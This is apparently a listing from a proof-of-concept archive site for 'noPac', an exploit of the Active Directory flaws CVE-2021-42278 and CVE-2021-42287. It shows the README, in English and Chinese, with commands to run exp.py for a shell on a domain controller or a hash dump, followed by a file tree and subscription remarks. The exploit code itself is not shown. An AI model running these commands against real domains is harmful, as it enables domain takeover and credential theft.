Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-42278 PoC — Active Directory Domain Services Elevation of Privilege Vulnerability

Source
https://github.com/waterrr/noPac
Associated Vulnerability
Title:Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2021-42278)
Description:Active Directory Domain Services Elevation of Privilege Vulnerability
Description
Exploiting CVE-2021-42278 and CVE-2021-42287
Readme
# noPac
Exploiting CVE-2021-42278 and CVE-2021-42287 <br>
原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。

# 使用
```
pip3 install -r requirements.txt
# GetShell
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -shell
# DumpHash
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -dump
```


# 修改
- 修改了原版作者在Kali下的smbexec等执行路径问题
- 修改模拟上线主机名特征


# 参考
https://github.com/cube0x0/noPac <br>
https://github.com/WazeHell/sam-the-admin
File Snapshot

 [4.0K]  /data/pocs/6b7b2ad9a494cde2e39a2e4da363515373771e01
├── [8.0K]  exp.py
├── [ 597]  README.md
├── [  16]  requirements.txt
├── [ 20K]  secretsdump.py
├── [ 16K]  smbexec.py
└── [4.0K]  utils
    ├── [ 10K]  addcomputer.py
    ├── [ 13K]  helper.py
    └── [ 31K]  S4U2self.py

1 directory, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →